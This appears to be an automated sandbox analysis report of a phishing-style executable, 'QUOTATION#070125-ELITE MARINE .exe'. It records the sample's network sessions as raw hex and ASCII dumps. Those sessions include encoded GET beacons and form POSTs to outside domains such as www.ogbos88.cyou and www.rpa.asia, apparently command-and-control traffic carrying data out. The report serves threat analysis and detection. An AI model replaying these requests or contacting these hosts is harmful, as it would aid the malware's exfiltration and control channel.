                                                                          Jan 9, 2025 16:52:35.455009937 CET3867OUTData Raw: 52 44 70 74 5a 7a 32 62 2b 31 6a 37 2b 79 55 35 41 55 42 64 72 53 69 4d 6c 44 52 52 6f 56 65 71 6b 6c 69 67 61 59 65 67 64 76 2b 52 54 73 67 2b 34 73 55 45 2b 33 31 65 2f 4d 6f 30 4a 4d 51 74 75 46 39 58 75 50 30 39 78 4b 4d 6b 68 2f 79 64 45 46
                                                                          Data Ascii: RDptZz2b+1j7+yU5AUBdrSiMlDRRoVeqkligaYegdv+RTsg+4sUE+31e/Mo0JMQtuF9XuP09xKMkh/ydEFXUL6Ch06TbOdvPBekA4FyRislw6WhoIoX5dusRWgFfJ43w5Fif4e/udovXehnvfG9LjCS8Cf7MAQPxo3K8IVwLZvz8zjrZ5ti6uaOiQ9T7FHwlnMeo4IGyriuGq3pg9Uklq+QTr+UuiSbfnJxGO++Z0kLwULnsVbp
                                                                          Jan 9, 2025 16:52:35.455094099 CET1507OUTData Raw: 59 6c 73 38 4d 4e 65 4d 33 63 62 6a 31 51 77 70 4c 44 35 52 6a 46 43 54 6b 38 42 78 61 5a 64 39 37 37 57 76 32 4d 79 48 45 58 34 58 4d 54 30 79 31 62 68 77 79 62 4b 47 41 4d 59 6f 51 53 6e 4a 71 43 47 4a 55 48 56 7a 77 30 4e 61 39 37 4e 57 7a 6a
                                                                          Data Ascii: Yls8MNeM3cbj1QwpLD5RjFCTk8BxaZd977Wv2MyHEX4XMT0y1bhwybKGAMYoQSnJqCGJUHVzw0Na97NWzjoDegciFWGj6+oQqiBhimJ92KcsCqE1GrhfsFLeVq2CGzMknTVHx0n7uw4QuAqbk/1HONxnLYfj1CGY+vPGCyUPAiI+3JdkWfLWEWhM1Oi1lVcWR2ioIlTQRVUeTdTrFQoVWxv9xD+3vHzWigsx1fcTJJSNl/VFGdi
                                                                          Jan 9, 2025 16:52:35.806282997 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:35 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:35.806313038 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          73192.168.11.2049818160.25.166.12380
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:38.335314989 CET526OUTGET /bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:38.691433907 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:38 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:38.691467047 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          74192.168.11.2049819104.21.13.14180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:46.861552000 CET795OUTPOST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 41 73 77 73 49 6d 57 6d 35 43 47 6a 71 51 42 6a 78 4a 4e 76 51 3d 3d
                                                                          Data Ascii: lV=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZAswsImWm5CGjqQBjxJNvQ==
                                                                          Jan 9, 2025 16:52:46.994981050 CET810INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:46 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:46 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1NZm42YGBhnGZaQhzcrJ4iTiTL6gEQpHtxQu5rM%2Bs5PFD2kLNtZ9ICo7qNJ8%2FbPvvZd69h%2By6%2Bk1nZ%2FKO6Gil6PGsSLMSoPt%2BJrhMWV8Rb5oFDHlGrSRtfqveqYlsd1xlV2m"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598ad483ae80d-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          75192.168.11.2049820104.21.13.14180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:49.521169901 CET815OUTPOST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 47 47 31 7a 6b 62 76 4b 2f 4e 57 78 72 78 4c 64 46 64 37 6b 3d
                                                                          Data Ascii: lV=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3GG1zkbvK/NWxrxLdFd7k=
                                                                          Jan 9, 2025 16:52:49.653971910 CET806INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:49 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:49 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9MRuK%2FeOM1L4gyS5qh3gVF3PUE4pmF17lKhOpnEGxir0pXlkve2z3O7qi%2B5JY0Vt6oNITJWq6bE3yYfnYxlF3CIRiY097%2F1BsrX2Nea44%2BTgGmGxpF0GEbj5ze2ON0OvPIF"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598bdeb13636f-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          76192.168.11.2049821104.21.13.14180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:52.172091007 CET1289OUTPOST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 31 79 48 73 32 4c 34 6e 33 48 53 38 52 37 48 35 5a 58 42 53 55 36 45 55 4a 41 6e 75 59 57 54 78 79 58 77 63 42 38 72 67 70 75 54 39 49 47 38 71 6f 31 53 6d 6c 59 33 73 51 72 4d 58 54 72 34 45 6f 43 35 4f 6e 6c 62 6b 70 68 53 66 38 33 7a 45 67 51 72 39 41 42 32 73 51 6c 36 79 5a 63 6d 35 35 44 53 68 79 6e 4d 37 32 32 37 79 6d 55 75 74 59 76 61 62 76 74 68 47 36 54 42 59 42 4c 45 31 39 6f 61 44 76 72 58 63 63 44 37 44 32 47 51 4a 50 44 76 36 49 49 35 78 38 64 64 46 6c 39 56 4f 46 41 4e 33 72 64 43 69 4c 56 6e 4e 72 47 68 35 35 73 4c 43 38 75 33 6a 43 68 39 51 4c 67 55 66 4a 65 4b 78 33 6c [TRUNCATED]
                                                                          Data Ascii: lV=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj51yHs2L4n3HS8R7H5ZXBSU6EUJAnuYWTxyXwcB8rgpuT9IG8qo1SmlY3sQrMXTr4EoC5OnlbkphSf83zEgQr9AB2sQl6yZcm55DShynM7227ymUutYvabvthG6TBYBLE19oaDvrXccD7D2GQJPDv6II5x8ddFl9VOFAN3rdCiLVnNrGh55sLC8u3jCh9QLgUfJeKx3lAirVxgQND0gbkRaAAniDbLJz2k7dSWE5yFZEUaOADkKuEIjwTQly/qfGuNnBAyxr04WNyp1odqbRNei/IjZA3bIiEiAr/kHcoGoEtJpqcg6UntDbo6jocQX84qspY1ZJ0p8FcIRT1vNJDVE4yIkImROWLh0Ow8jDdLv2C/L4AFTnDMvjuFGjKA2tHWwhU1caOR82yMGGsacYREDshpiXMixHChlwV1bOcao17swzRzb7K2AoMCULnl9MNGICEJje5+RXGg8i6QV110SIWi61SuI8K4BfjCwXJlsUkE3ARHZysswkg3cquqA9PBCyWdUxfhjhykrYqasrWAXAv2pSybc06Z6XLDsTI6
                                                                          Jan 9, 2025 16:52:52.172142982 CET3867OUTData Raw: 7a 74 46 59 2b 4d 71 38 47 71 2f 50 33 7a 51 54 42 78 54 6a 48 71 4c 67 72 2b 47 2f 74 71 47 6a 4a 73 32 4b 63 37 4a 72 6d 7a 43 32 6b 4b 6c 78 4f 4e 44 62 7a 44 76 30 6a 4c 47 52 58 7a 77 55 47 51 53 55 34 49 41 70 70 41 68 7a 55 72 66 64 6b 6b
                                                                          Data Ascii: ztFY+Mq8Gq/P3zQTBxTjHqLgr+G/tqGjJs2Kc7JrmzC2kKlxONDbzDv0jLGRXzwUGQSU4IAppAhzUrfdkk4P7w+cqPAu9ofscbQAo+YMfJ2UZeTrNMkVfN59CyZ9uKqp+0xMxVTl2wvSY0d3UfpdsCxJZGCijmJ5PNTOUFnSkZGhfXNiijFWGpedP+MCYqykrbTwfmU1p9NEOkfFHLDtt52WWK+eJVGtzuB2gtVX3hYc052dYU/
                                                                          Jan 9, 2025 16:52:52.172189951 CET2808OUTData Raw: 6d 2b 7a 6d 75 4e 68 43 6c 72 6b 45 42 5a 51 58 75 48 5a 58 6f 48 34 49 6c 46 69 4b 47 63 34 4d 2b 4a 39 77 30 7a 62 38 48 43 6a 44 42 41 6c 78 45 4d 6c 55 30 5a 68 68 4c 71 6c 37 54 7a 6b 65 6e 43 36 6a 66 65 74 4f 69 63 44 33 61 2f 30 68 71 65
                                                                          Data Ascii: m+zmuNhClrkEBZQXuHZXoH4IlFiKGc4M+J9w0zb8HCjDBAlxEMlU0ZhhLql7TzkenC6jfetOicD3a/0hqet+LArVwXurnr7K55WTZY8BoNHB8tem35/pgbxba5y78q7JbkxIyT4gWTAnoSG57x/H83Co7UQiZmqKhiGF3oNavkhLnt44J/It9Y691LkT6Y0H9FA4ujaLgZ5zEEvL7W5dALQO+Sp5SpkvDBF4MSaq945uBKshcNQ
                                                                          Jan 9, 2025 16:52:52.328084946 CET808INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:52 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:52 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5deEG7cro%2FoRshQZZ54X7tCRhTRdWjoQqdZVWHuYrI1OLQc%2BHs00bQYA%2Fk5e98vaoZhefee7i05pbdknDlwrVF0f3UY3f%2BvWChXuasOZo5p3thmKmBnk17ItdteQ%2FuH8cOM"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598ce7e3c86fc-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          77192.168.11.2049822104.21.13.14180
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:54.829241037 CET530OUTGET /kj1o/?lV=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:54.954835892 CET783INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:52:54 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:52:54 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQmfIxJC0uUFpaSeVVGGT%2FMOoVuKBqOJ04gzqOmGvfmTnkcOWCuuh3W3x7%2FEsVMVcy7gY4NDFdenZ4INW7oQZAJASHSNWy7C8o4WT5FmCS%2Bw5%2B4QyzUaEqHgFV8hwVXxic6C"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff598df1864eb08-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:10:46:15
                                                                          Start date:09/01/2025
                                                                          Path:C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
                                                                          Imagebase:0x630000
                                                                          File size:1'749'504 bytes
                                                                          MD5 hash:71A9653E383348DB78EDAA7619DEA426
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
